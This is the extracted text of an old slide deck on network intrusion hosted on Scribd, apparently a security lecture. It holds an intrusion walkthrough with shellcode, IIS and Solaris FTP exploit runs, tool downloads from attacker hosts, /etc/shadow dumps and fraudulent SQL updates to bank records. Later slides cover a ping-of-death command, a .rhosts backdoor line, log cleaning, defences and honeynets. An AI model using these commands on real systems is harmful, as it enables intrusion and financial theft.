Scribd Logo
Upload

Welcome to Scribd!

  • 218 views

    Hacking

    Uploaded by

    abdul525
    The hacker used various tools like nslookup, nmap, telnet to scan the target network 172.16.16.0/24 and identify vulnerable systems. An IIS web server at 172.16.16.5 was found with many open ports. The hacker then exploited a buffer overflow vulnerability in this server to execute a reverse shell and gain remote command line access with root privileges. Next, the hacker scanned another host 172.16.16.176 running Solaris, identified it as Solaris 8, and used an FTP exploit to gain root access to this system as well. The hacker then used the compromised systems to further explore the internal network.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd

    Hacking

    Uploaded by

    abdul525
    218 views76 pages
    The hacker used various tools like nslookup, nmap, telnet to scan the target network 172.16.16.0/24 and identify vulnerable systems. An IIS web server at 172.16.16.5 was found with many open ports. The hacker then exploited a buffer overflow vulnerability in this server to execute a reverse shell and gain remote command line access with root privileges. Next, the hacker scanned another host 172.16.16.176 running Solaris, identified it as Solaris 8, and used an FTP exploit to gain root access to this system as well. The hacker then used the compromised systems to further explore the internal network.

    Original Description:

    hacking totorial

    Copyright

    © © All Rights Reserved

    Available Formats

    PPT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The hacker used various tools like nslookup, nmap, telnet to scan the target network 172.16.16.0/24 and identify vulnerable systems. An IIS web server at 172.16.16.5 was found with many open ports. The hacker then exploited a buffer overflow vulnerability in this server to execute a reverse shell and gain remote command line access with root privileges. Next, the hacker scanned another host 172.16.16.176 running Solaris, identified it as Solaris 8, and used an FTP exploit to gain root access to this system as well. The hacker then used the compromised systems to further explore the internal network.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd
    Download as ppt, pdf, or txt
    218 views76 pages

    Hacking

    Uploaded by

    abdul525
    The hacker used various tools like nslookup, nmap, telnet to scan the target network 172.16.16.0/24 and identify vulnerable systems. An IIS web server at 172.16.16.5 was found with many open ports. The hacker then exploited a buffer overflow vulnerability in this server to execute a reverse shell and gain remote command line access with root privileges. Next, the hacker scanned another host 172.16.16.176 running Solaris, identified it as Solaris 8, and used an FTP exploit to gain root access to this system as well. The hacker then used the compromised systems to further explore the internal network.

    Copyright:

    © All Rights Reserved
    Download as PPT, PDF, TXT or read online from Scribd
    Download as ppt, pdf, or txt
    You are on page 1of 76

    Hacking

    hacker.com:~$ nslookup
    Default Server: ns.hacker.com
    Address: 3.1.33.7
    > www.billionaireshow.com
    Non-authoritative answer:
    Name:
    www.billionaireshow.com
    Address:
    172.16.16.5
    > exit
    hacker.com:~$ nmap -sS 172.16.16.5
    Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
    Interesting ports on www.billionaireshow.com (172.16.16.5):
    (The 1514 ports scanned but not shown below are in state: closed)
    Port
    80/tcp
    135/tcp
    139/tcp
    445/tcp
    1080/tcp
    8080/tcp

    State
    open
    open
    open
    open
    open
    open

    Service
    http
    loc-srv
    netbios-ssn
    microsoft-ds
    socks
    http-proxy

    Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds


    hacker.com:~$ telnet 172.16.16.5 80
    Trying 172.16.16.5...
    Connected to 172.16.16.5.
    Escape character is '^]'.

    HEAD / HTTP/1.0
    HTTP/1.1 200 OK
    Content-Length: 2506
    Date: Mon, 01 Oct 2001 15:04:41 GMT
    Content-Location:
    http://172.16.16.5/postinfo.html
    Content-Type: text/html
    Server: Microsoft-IIS/5.0
    Accept-Ranges: bytes
    Last-Modified: Mon, 01 Oct 2001 11:06:52
    GMT
    ETag: "20c1bf347cfc01:941"
    Connection closed by foreign host.
    hacker.com:~$ ./idaexploit.sh 172.16.16.5
    Connecting . . .
    Dumping Shell:
    \x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x=
    1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\=
    x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c=
    \x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4=
    \xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x6=
    8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x=
    99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\=
    xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66=

    \x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9=
    9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x=
    99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\=
    x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99=
    \x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x9=
    9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x=
    90\x90\x90\x90\x90
    Done...
    Completing...
    ...
    GET /test.ida?`perl -e 'print "N"x230'`
    %u0101%u00b5%u0101%u00b5%u0101%u00b=5%u0101%u00b5=3Dx HTTP/1.0
    ...
    GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=
    %u0abf%u00b6=3Dx HTTP/1.0
    ...
    yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE=20
    ini.TINY:
    Binding cmd.exe: PORT 80...
    Finished...ENJOY!
    C:\WINNT\system32>
    C:\WINNT\system32> cd ..
    C:\WINNT> dir
    Volume in drive C has no label.
    Volume Serial Number is 6446-0F57

    Directory of C:\WINNT
    08/24/2001
    08/24/2001
    12/06/1999
    12/06/1999
    12/06/1999
    09/07/2001
    12/06/1999
    07/21/2000
    07/21/2000
    09/28/2001
    12/06/1999
    12/06/1999

    07:23p
    07:23p
    05:00p
    05:00p
    05:00p
    02:00p
    05:00p
    12:05p
    12:05p
    04:41p
    05:00p
    05:00p

    36 vb.ini
    37 vbaddin.ini
    20,240 vmmreg32.dll
    366,864 welcome.exe
    23 welcome.ini
    348 win.ini
    256,192 winhelp.exe
    269,584 winhlp32.exe
    193,296 winrep.exe
    288,880 WMSysPrx.prx
    9,522 Zapotec.bmp
    707 _default.pif

    70 File(s)
    3,934,990 bytes
    29 Dir(s) 7,330,738,176 bytes free
    C:\WINNT\system32>
    C:\WINNT\system32> tftp.exe -i hackerbox.com GET nmap.exe c:\temp\nmap.exe
    C:\WINNT\system32 cd \temp
    >
    C:\temp>
    nmap sP 172.16.16.1-255
    Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
    Host www.billionaireshow.com (172.16.16.5) appears to be up.
    Host itguy.billionaireshow.com (172.16.16.176) appears to be up.
    Nmap run completed -- 255 IP addresses (2 host(s) up) scanned in 7 second
    C:\temp>

    C:\temp> nmap O 172.16.16.176


    Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
    Interesting ports on itguy.billionaireshow.com (172.16.16.176):
    (The 1514 ports scanned but not shown below are in state: closed)
    21 /tcp
    22/tcp
    4045/tcp
    6112/tcp

    open
    open
    open
    open

    ftpd
    ssh
    lockd
    dtspc

    TCP Sequence Prediction: Class=random positive increments


    Difficulty=33565 (Worthy challenge)
    Remote OS guesses: Solaris 8
    Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
    C:\temp> ftp 172.16.16.176
    Connected to 172.16.16.176.
    220 itguy.billionaireshow.com FTP server ready.
    Name (172.16.16.176:hacker): ^C
    C:\temp> perl glob.pl 172.16.16.176 anonymous glob@glob.com
    RET: 0xbfbfeae8
    Align: 1
    RET: 0x805baf8
    Align: 1
    RET: 0x805e23a
    Align: 1
    220 itguy.billionaireshow.com FTP server (Version 6.00LS) ready.
    Logged in as anonymous/glob@glob.com. Sending evil STAT command.

    Exploit Starting...
    \x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
    \xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
    \x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
    \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
    \x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
    Exploit finished.. ENJOY!
    # whoami
    root
    #

    Solaris 8

    Exploit Starting...
    \x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
    \xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
    \x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
    \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
    \x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
    Exploit finished.. ENJOY!
    # whoami
    root
    # nslookup
    Default Server: billionaireshow.com
    Address: 172.16.15.2
    > ls billionaireshow.com
    [billionaireshow.com]
    billionaireshow.com.
    billionaireshow.com.
    billiondollar
    ap.billionaireshow.com
    game.ec.billionaireshow.com
    > exit
    #

    NS server = ns.billionaireshow.com
    NS server = game.ec.billionaireshow.com
    MX server = mail.billionaireshow.com
    A
    172.16.7.14
    A
    172.16.7.22

    Accounts Payable

    Solaris 8

    Exploit Starting...
    \x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
    \xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
    \x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
    \x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
    \x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
    Exploit finished.. ENJOY!
    # whoami
    root
    # nslookup
    Default Server: billionaireshow.com
    Address: 172.16.15.2
    > ls billionaireshow.com
    [billionaireshow.com]
    billionaireshow.com.
    billionaireshow.com.
    billiondollar
    ap.billionaireshow.com
    game.ec.billionaireshow.com

    NS server = ns.billionaireshow.com
    NS server = game.ec.billionaireshow.com
    MX server = mail.billionaireshow.com
    A
    172.16.7.14
    A
    172.16.7.22

    > exit
    # telnet 172.16.6.14 22
    Trying 172.16.16.14...
    Connected to 172.16.16.14.
    Escape character is '^]'.
    SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

    Connection closed by foreign host.


    # ssh l lp ap.billionaireshow.com
    lps password:
    Authentication successful.
    Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
    lp@AP /home$
    lp@AP /home$ uname -a
    SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
    lp@AP /home$

    Accounts Payable

    Solaris 8

    SunOS 5.8

    Connection closed by foreign host.


    # ssh l lp ap.billionaireshow.com
    lps password:
    Authentication successful.
    Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
    lp@AP /home$
    lp@AP /home$ uname -a
    SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
    lp@AP /home$ cd /
    lp@AP /$
    bam
    bin
    opt
    var

    ls
    etc
    home
    proc
    vakkk

    lost+found root
    mnt
    sbin
    oracle9

    tmp
    usr
    dev
    idxs

    boot
    lib

    lp@AP /home$ cd /tmp


    lp@AP /tmp$ ftp hackertoolz.com
    Connected to hackertoolz.com.
    220 SMACK FTP server (Version 5.6(1) Tue Jun 27 10:52:28 PDT 2000) ready.
    Name (hackertoolz.com:lp): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> get dtprintinfoBO.c

    200 PORT command successful.


    150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
    226 ASCII Transfer complete.
    200 PORT command successful.
    150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
    226 ASCII Transfer complete.
    local: dtprintinfoBO.c remote: dtprintinfoBO.c
    1558 bytes received in 0.014 seconds (107.57 Kbytes/s)
    ftp> bye
    221 Goodbye.
    lp@ap /tmp$ gcc o sploit dtprintinfoBO.c
    lp@ap /tmp$ ./sploit
    HACKBOX...admintool Overflow Exploits.
    creating...ADJUST1::2.......done
    creating...ADJUST2::1.......done
    creating...BUFSIZE1::1000.......done
    creating...BUFSIZE2::800.......done
    creating...OFFSET::3600.......done
    creating...OFFSET2::400....done
    Sending Shell.......
    \x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68
    \x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10
    \x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0
    \x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82
    \x10\x20\x01\x91\xd0\x20\x08
    ....done

    ENJOY YOUR NEW BOX!


    whoami
    #
    root
    #
    # cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:/bin/bash
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:
    # head /etc/shadow
    root:h1QbJ57QWWmVY:11177:0:::::
    bin:*:11038:0:99999:7:::
    daemon:*:11038:0:99999:7:::
    adm:*:11038:0:99999:7:::
    lp:*:11038:0:99999:7:::
    sync:*:11038:0:99999:7:::
    shutdown:*:11038:0:99999:7:::
    halt:*:11038:0:99999:7:::
    mail:*:11038:0:99999:7:::
    #

    # sqlplus
    SQL> describe accounts
    Name

    Null?

    Type

    ------------------

    --------

    -----------

    LNAME
    FNAME
    ADDR1
    ADDR2
    ZIP
    PHONE
    SSN
    BANK
    ROUTING_NUM
    ACCOUNT_NUM

    NOT NULL VARCHAR2(20)


    NOT NULL VARCHAR2(15)
    NOT NULL VARCHAR2(30)
    NOT NULL VARCHAR2(30)
    NOT NULL NUMBER(5)
    NOT NULL CHAR(12)
    NOT NULL NUMBER(9)
    NOT NULL VARCHAR2(30)
    NOT NULL NUMBER(9)
    NOT NULL NUMBER(12)

    SQL> select ACCOUNT_NUM, ROUTING_NUM from accounts


    ACCOUNT_NUM
    -----------

    ROUTING_NUM

    -----------

    8811101011
    8822822281
    4922929481
    5594492295
    6839186571
    3985792816

    060101015
    060192911
    069882211
    069592215
    062798581
    061873710

    0985949922
    320984581
    2092028481
    204098285
    6096780914
    098029820
    4098320921
    450982091
    6098509449
    095098209
    4090921109
    609830329
    6987329810
    908848828
    4987298731
    984598472
    5098222091
    095509860
    0983039311
    098098571
    SQL> update accounts set ACCOUNT_NUM = 0069858915 where LNAME = '*';
    SQL> update accounts set ROUTING_NUM = 6695922941 where LNAME = '*';
    SQL> select LNAME, ACCOUNT_NUM, ROUTING_NUM from accounts where LNAME = '*';
    LNAME
    ----Young
    Varick
    Brantley
    Weinstein
    Davis
    Reynard
    Halpert
    Davis
    Kennedy
    Scott
    Michaels
    Noojin

    ACCOUNT_NUM
    ----------- ----------0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915
    0069858915

    ROUTING_NUM
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941
    6695922941

    The current state of the Internet


    An unprotected computer on the
    Internet WILL BE EXPLOITED
    within 24 hours!
    Richard Treece, ISS, 15 April 2002

    Hacker Techniques

    Find and attack the weakest link


    Reconnaissance
    Gain access to first machine
    Use acquired access to gain further access

    Disclaimer
    Hacking is illegal!
    Some actual organizations and computers are
    used in the examples,
    but only to provide realism

    Do not hack the examples!

    TheStagesofaNetworkIntrusion
    1.Scan:
    IPaddressesinuse,
    operatingsystemisinuse,
    openTCPorUDPports
    2.Exploit:
    DenialofService(DoS)
    scriptsagainstopenports
    3. GainRootPrivilege:
    BufferOverflows
    GetRoot/AdministratorPassword
    4.InstallBackDoor
    5.UseIRC(InternetRelayChat)

    27

    Reconnaissance
    Public information
    www
    news postings

    Network Scanning
    Operating System Detection

    War-dialing

    Public Info: www.internic.net


    Domain Name: GATECH.EDU
    Registrant:
    Georgia Institute of Technology, 258 4TH St, Atlanta,
    GA 30332
    Contacts:
    Administrative Contact: Herbert Baines III
    GA Institute of Tech (GATECH-DOM), 258 4TH St.,
    Atlanta, GA 30332
    (404) 894-0226, herbert.baines@oit.gatech.edu
    Technical Contact: OIT, Georgia Tech 258 Fourth
    Street Atlanta, GA 30332
    (404) 894-0226, hostmaster@gatech.edu
    Name Servers:
    TROLL-GW.GATECH.EDU 130.207.244.251
    GATECH.EDU 130.207.244.244
    NS1.USG.EDU 198.72.72.10

    Public Information: news postings


    Author: rajeshb <rajeshb@ncs.com.sg>
    Date: 1998/12/07
    Forum: comp.unix.solaris
    author posting history
    Hi,
    Could someone tell me how to configure anonymous ftp for
    multiple IP addresses. Basically we are running virtual
    web
    servers on one server. We need to configure anonymous ftp
    for each virtual web account. I appreciate it if someone
    can
    help me as soon as possible. I know how to configure an
    anonymous ftp for single IP.
    Thanks,
    Rajesh.

    Network Scanning
    Identifies:
    accessible machines
    servers (ports) on those machines

    Network Scanning (contd)


    nmap -t -v hack.me.com
    21
    23
    37
    53
    70
    79
    80
    109
    110
    111
    113
    143
    513
    514
    635

    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp
    tcp

    ftp
    telnet
    time
    domain
    gopher
    finger
    http
    pop-2
    pop-3
    sunrpc
    auth
    imap
    login
    shell
    unknown

    Operating System Detection


    Stack fingerprinting:
    OS vendors often interpret specific RFC
    guidance differently when implementing their
    versions of TCP/IP stack.
    Probing for these differences gives educated
    guess about the OS
    e.g., FIN probe, dont fragment it

    nmap -O

    War-dialing
    Find the organizations modems,
    by calling all of its phone numbers

    www.fbi.gov: (202) 324-3000


    Reverse Business Phone: 202-324-3
    All Listings
    Government Offices-US
    US Field Ofc
    1900 Half St Sw
    Washington, DC

    202-324-3000

    TheStagesofaNetworkIntrusion
    1.Scan:
    IPaddressesinuse,
    operatingsystemisinuse,
    openTCPorUDPports
    2.Exploit:
    DenialofService(DoS)
    scriptsagainstopenports
    3. GainRootPrivilege
    BufferOverflows
    GetRoot/AdministratorPassword
    4.InstallBackDoor
    5.UseIRC(InternetRelayChat)

    35

    Denial of Service (DOS)


    (Source: Chapter 14 Network Intrusion Detection An Analysts Handbook, Second Edition, Northcutt and Novak)

    1)

    SMURF ICMP echos

    2)

    ECHO-CHARGEN UDP port 7 is echo; UDP port 19 is character generator.


    Spoof a source address and two victims pound each other

    3)

    TEARDROP Send fragments with offset too small


    source.40909 > target.3826 : udp 28 (frag 242 : 36 @ 0+)
    source.40909 > target.3826 : 28 (frag 242 : 4 @ 24)+)
    fragment ID = 242 with 36 bytes of data starting at offset 0
    fragment ID = 242 with 4 bytes of data starting at offset 24
    but this means we must back up from 36 bytes already received to 24 where
    this goes.
    Negative numbers may look like large positive numbers, put in other programs
    section of memory
    If intrusion detection system (IDS) does not support packet reassembly check,
    will get past the IDS

    Denial of Service (DOS)


    4) PING OF DEATH On a windows NT box type
    ping L 65510 <victim IP address>
    This creates a packet when reassembled that is larger than the
    max size of 65,535 that is allowed. Causes system crash.
    - Max IP packet size allowed = 65535
    - ICMP echo has a pseudo header consisting of 8 bytes of
    ICMP header info
    - Next in the ICMP packet is the ping data that is sent
    - Maximum amount of data can send is
    65535 20 IP 8 ICMP = 65507
    - We sent 65510 which is too large
    5) LAND ATTACK Source IP address/Port equals Dest IP Address/Port

    Denial of Service (DOS)


    6) NMAP Scans looking for open ports. You may download from www.insecure.org
    Can crash unpatched systems
    Can use many modes:
    Vanilla TCP connect scanning
    TCP SYN (half open scanning)
    TCP FIN, xmas, or null (stealth) scanning
    TCP ftp proxy (bounce attack) scanning (uses ftp port 20 to connect even though
    not established by connection to port 21 as is normal procedure)
    SYN FIN Scanning using IP fragments
    UDP raw ICMP port unreachable scanning
    ICMP scanning (ping-sweep)
    TCP Ping Scanning
    Remote OS identification by TCP/IP Finger Printing

    Distributed Denial of Service (DDOS)


    Client machine used to coordinate attack
    Master or Handler controls subservient computers
    Agents or Daemons Actually do the attack
    1)

    TRINOO Sends UDP floods to random destination port numbers on victim

    2)

    TFN Sends UDP flood, TCP SYN Flood, ICMP Echo Flood, or a SMURF Attack
    Master communicates to daemon using ICMP echo reply, changes IP identification
    number and payload of ICMP echo reply to identify type of attack to launch.

    3) TFN2k First DDOS for windows. Communication between master and agents
    can be encrypted over TCP, UDP, or ICMP with no identifying ports
    4) STACHELDRAHT - Combination of Trinoo and TFN
    If you are a DDOS victim, at present this is very little you can do about it!!!

    TheStagesofaNetworkIntrusion
    1.Scan:
    IPaddressesinuse,
    operatingsystemisinuse,
    openTCPorUDPports
    2.Exploit:
    DenialofService(DoS)
    scriptsagainstopenports
    3. GainRootPrivilege:
    BufferOverflows
    GetRoot/AdministratorPassword
    4.InstallBackDoor
    5.UseIRC(InternetRelayChat)

    40

    The Holy Grail


    Hackers seek Superuser /Root Privilege
    (SUID) on the machine they are exploiting
    With SUID privilege, the own the machine
    They can use the resources available for
    their own purposes (e.g.. crack passwords)
    or destroy data on the machine

    Gaining SUID privilege


    1. Easiest way

    trying default manufacturer password settings

    2. Next Easiest Social Engineering

    Impersonate Tech Support


    Hide trojan software inside free games,
    screensavers, etc. (e.g.. Anna Kournikova)

    3. More Difficult Buffer Overflow Attack

    Must be a skilled programmer

    Gain access to first machine


    Configuration errors
    System-software errors

    Configuration errors: NFS


    $ showmount -e hack.me.com
    export list for hack.me.com:
    /home (everyone)

    Config errors: anonymous ftp (#1)


    $ ftp hack.me.com
    Connected to hack.me.com.
    220 xyz FTP server (SunOS) ready.
    Name (hack.me.com:jjyuill): anonymous
    331 Guest login ok, send ident as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> get /etc/passwd
    /etc/passwd: Permission denied
    ftp> cd ../etc
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (152.1.75.170,32871)
    (0 bytes).
    226 ASCII Transfer complete.

    Config errors: anonymous ftp (#2)


    ftp> get passwd
    200 PORT command successful.
    150 ASCII data connection for passwd
    (152.1.75.170,32872) (23608 bytes).
    226 ASCII Transfer complete.
    local: passwd remote: passwd
    23962 bytes received in 0.14 seconds (1.7e+02
    Kbytes/s)
    ftp> quit
    221 Goodbye.

    Config errors: anonymous ftp (#3)


    $ less passwd
    sam:0Ke0ioGWcUIFg:100:10:NetAdm:/home/sam:/bin/csh
    bob:m4ydEoLScDlqg:101:10:bob:/home/bob:/bin/csh
    chris:iOD0dwTBKkeJw:102:10:chris:/home/chris:/bin/csh
    sue:A981GnNzq.AfE:103:10:sue:/home/sue:/bin/csh
    $ Crack passwd
    Guessed sam [sam]
    Guessed sue [hawaii]

    System-software errors: imapd (#1)


    imapd buffer-overflow
    $ telnet hack.me.com 143
    Trying hack.me.com...
    Connected to hack.me.com
    Escape character is '^]'.
    * OK hack.me.com IMAP4rev1 v10.205 server
    ready
    AUTH=KERBEROS

    System-software errors: imapd (#2)


    sizeof(mechanism)==2048
    sizeof(tmp)==256
    char *mail_auth (char *mechanism,
    authresponse_t resp,int argc,char *argv[])
    {
    char tmp[MAILTMPLEN];
    AUTHENTICATOR *auth;
    /* make upper case copy of mechanism name */
    ucase (strcpy (tmp,mechanism));

    Get further access (#1)


    If user access, try to gain root
    usually via a bug in a command which runs as
    root
    e.g. lprm for RedHat 4.2 (4/20/98)

    Run crack on /etc/passwd


    users often have the same password on
    multiple machines

    Get further access (#2)


    Exploit misconfigured file permissions in users
    home directory
    e.g. echo + + >> .rhosts
    Format of entries: [+|-] [host] [+|-] [user]

    If root, install rootkits


    Trojans, backdoors, sniffers, log cleaners

    Packet Sniffing
    ftp and telnet passwords
    e-mail
    Lotus Notes

    Log cleaners
    Start with syslog.conf, edit log files, Wzap wtmp file
    Edit shell history file (or disable shell history)

    TheStagesofaNetworkIntrusion
    1.Scan:
    IPaddressesinuse,
    operatingsystemisinuse,
    openTCPorUDPports
    2.Exploit:
    DenialofService(DoS)
    scriptsagainstopenports
    3. GainRootPrivilege:
    BufferOverflows
    GetRoot/AdministratorPassword
    4.InstallBackDoor
    5.UseIRC(InternetRelayChat)

    52

    Back Doors

    Back Doors
    1. Allows hackers to come back at their leisure.
    2. Can exist at application level

    Back Orifice

    3. Can exist at system level

    Replace dlls in NT system


    Replace functions in Linux/Unix e.g. login, ps, etc.

    4. Can exist at root level

    Most difficult to detect

    5. Some root kits increase the security of a system and


    are used by network administrators on their own
    systems!

    Packet Sniffing
    firewall

    router
    ISP

    work station
    mail server

    Internet

    work station
    web and ftp
    server

    work st.

    work st.

    Sniffing: Captured Passwords


    Source IP.port

    Destination IP.port

    333.22.112.11.3903-333.22.111.15.23: login [root]


    333.22.112.11.3903-333.22.111.15.23: password [sysadm#1]
    333.22.112.11.3710-333.22.111.16.23: login [root]
    333.22.112.11.3710-333.22.111.16.23: password [sysadm#1]
    333.22.112.91.1075-333.22.112.94.23: login [lester]
    333.22.112.91.1075-333.22.112.94.23: password [l2rz721]
    333.22.112.64.1700-444.333.228.48.23: login [rcsproul]
    333.22.112.64.1700-444.333.228.48.23: password [truck]

    TheStagesofaNetworkIntrusion
    1.Scan:
    IPaddressesinuse,
    operatingsystemisinuse,
    openTCPorUDPports
    2.Exploit:
    DenialofService(DoS)
    scriptsagainstopenports
    3. GainRootPrivilege:
    BufferOverflows
    GetRoot/AdministratorPassword
    4.InstallBackDoor
    5.UseIRC(InternetRelayChat)

    57

    Internet Relay Chat


    1. Some hackers, when they exploit a system,
    announce it to the hacker community.
    2. This is normally done by script kiddies as
    bragging rights.
    3. A sophisticated hacker on the other hand, will
    most likely cover his/her tracks so that you will
    never know that they got into your systems.

    Hacker Techniques

    Find and attack the weakest link


    Reconnaissance
    Gain access to first machine,
    Use acquired access to gain further access

    How to protect your computer


    1. Make sure your software is current and up to
    date (i.e. all current patches are installed)
    2. Run Firewall software

    http://www.zonealarm.com

    3. Run a Hardware firewall


    4. Run Intrusion Detection Software

    SNORT http://www.snort.org

    5. Run Tripwire (change tracking software)

    http://www.tripwire.com

    Honeynets

    Honeypots
    A security resource whos value lies in being
    probed, attacked or compromised.
    Has no production value, anything going to
    or from a honeypot is likely a probe, attack or
    compromise.

    Advantages / Disadvantages
    Advantages
    Reduce false negatives and false positives
    Collect little data, but data of high value
    Minimal resources
    Conceptually simple
    Disadvantages
    Single point of failure
    Risk

    What is a Honeynet

    High-interaction honeypot
    Used primarily to learn about the bad guys.
    Network of production systems.
    Once compromised, the data collected is used
    to learn the tools, tactics, and motives of the
    blackhat community.

    How it works
    A highly controlled network where every
    packet entering or leaving is monitored,
    captured, and analyzed.
    Any traffic entering or leaving the Honeynet
    is suspect by nature.

    http://project.honeynet.org/papers/honeynet/

    Risk
    Honeynets are highly complex, requiring
    extensive resources and manpower to
    properly maintain.
    Honeynets are a high risk technology. As a
    high interaction honeypot, they can be used
    to attack or harm other non-Honeynet
    systems.

    Legal Issues
    Privacy
    Entrapment
    Liability

    Privacy
    No single statute concerning privacy
    Electronic Communication Privacy Act (18
    USC 2701-11)
    Federal Wiretap Statute (Title III, 18 USC
    2510-22)
    The Pen/Trap Statute (18 USC 3121-27)

    Entrapment
    Used only by defendant to avoid
    conviction.
    Cannot be held criminally liable for
    entrapment.
    Applies only to law enforcement
    Even then, most legal authorities
    consider Honeynets non-entrapment.

    Upstream liability

    Any organization may be liable if a Honeynet


    system is used to attack or damage other nonHoneynet systems.
    Decided at state level, not federal
    Civil issue, not criminal

    This is why the Honeynet Project focuses so


    much attention on Data Control.

    You might also like